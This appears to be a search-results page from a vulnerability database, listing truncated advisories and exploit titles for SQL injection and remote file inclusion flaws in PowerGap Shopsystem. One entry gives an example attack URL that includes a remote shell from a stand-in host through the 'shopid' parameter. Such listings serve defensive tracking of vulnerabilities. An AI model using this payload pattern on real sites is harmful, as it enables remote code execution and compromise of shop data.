20 matches found
EUVD-2006-4226
Malware in sbrugna...
EUVD-2008-3547
Malware in sbrugna...
POWERGAP Shopsystem 's03.php' SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability
No description provided by source. ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Vendor site : http://www.powergap-shop.de...
PowerGap Shopsystem "ag" SQL Injection Vulnerability
CNCAN ID:CNCAN-2008081110 PowerGap Shopsystem is a PHP-based web application. PowerGap Shopsystem does not correctly handle user-submitted input; remote attackers can exploit the vulnerability to perform SQL injection attacks, obtaining sensitive information or manipulating the database. The problem is that the 's03.php' script does not correctly filter the "ag" parameter; by supplying a malicious SQL query as the parameter data, the original SQL logic can be altered, and sensitive information can be obtained or the database manipulated. No solution is currently available for PowerGap Shopsystem: http://www.powergap.de/shopsystem-powergap.htm...
SQL injection
SQL injection vulnerability in s03.php in Powergap Shopsystem, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...
CVE-2008-3561
SQL injection vulnerability in s03.php in Powergap Shopsystem, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...
CVE-2008-3561
SQL injection vulnerability in s03.php in Powergap Shopsystem, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...
CVE-2008-3561
The CVE-2008-3561 entry describes an SQL injection in Powergap Shopsystem via s03.php when magic_quotes_gpc is disabled. The vulnerable component is the ag parameter, enabling remote attackers to execute arbitrary SQL commands. Public sources (NVD, CVE listings) confirm the vulnerability and affe...
POWERGAP ShopSystem - 's03.php' SQL Injection
source: https://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or...
powergap-sql.txt
=============================================== PowerGap Shopsystem SQL Injection =============================================== Title: : PowerGap Shopsystem SQL Injection - URL : www.powergap.de - Found : 23 Jul. 2008 - 13:07 - Author : Rohit Bansal - Google Dork : intext:c POWERGAP - Exploit: ...
POWERGAP ShopSystem - s03.php SQL Injection
POWERGAP ShopSystem - s03.php SQL Injection source: https://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attack...
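Powergap Remote File Inclusion Vulnerability
Powergap is a PHP-based web application. Powergap does not correctly filter user-submitted URI data; remote attackers can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that multiple scripts lack filtering of the user-submitted 'shopid' parameter; supplying a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. Powergap Powergap Lite Powergap Powergap Busines http://www.powergap.de/ http://www.example.com/s01.php?shopid=http://SHELLURL.COM...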
POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability
No description provided by source. ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Vendor site : http://www.powergap-shop.de...
CVE-2006-4236
Multiple PHP remote file inclusion vulnerabilities in POWERGAP allow remote attackers to execute arbitrary PHP code via a URL in the (1) shopid parameter to (a) s01.php, (b) s02.php, (c) s03.php, and (d) s04.php; and possibly a URL located after "shopid=" or "sid=" in the PATH_INFO...
CVE-2006-4236
The CVE-2006-4236 entry describes multiple PHP remote file inclusion vulnerabilities in POWERGAP. An attacker can craft a URL using the shopid parameter (to s01.php, s02.php, s03.php, or s04.php) or manipulate PATH_INFO after shopid= or sid= to cause arbitrary PHP code execution on affected POWER...
CVE-2006-4236
Multiple PHP remote file inclusion vulnerabilities in POWERGAP allow remote attackers to execute arbitrary PHP code via a URL in the (1) shopid parameter to (a) s01.php, (b) s02.php, (c) s03.php, and (d) s04.php; and possibly a URL located after "shopid=" or "sid=" in the PATH_INFO...
powergap <= (s0x.php) Remote File Inclusion
================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ | Critical Level : Dangerous | | Vendor site : http://www.powergap-shop.de | | http://www.demo-shop.com | |...
POWERGAP 2003 - s0x.php Remote File Inclusion
POWERGAP 2003 - s0x.php Remote File Inclusion ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Vendor site : http://www.powergap-shop.de...
POWERGAP 2003 - 's0x.php' Remote File Inclusion
================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Vendor site : http://www.powergap-shop.de http://www.demo-shop.com...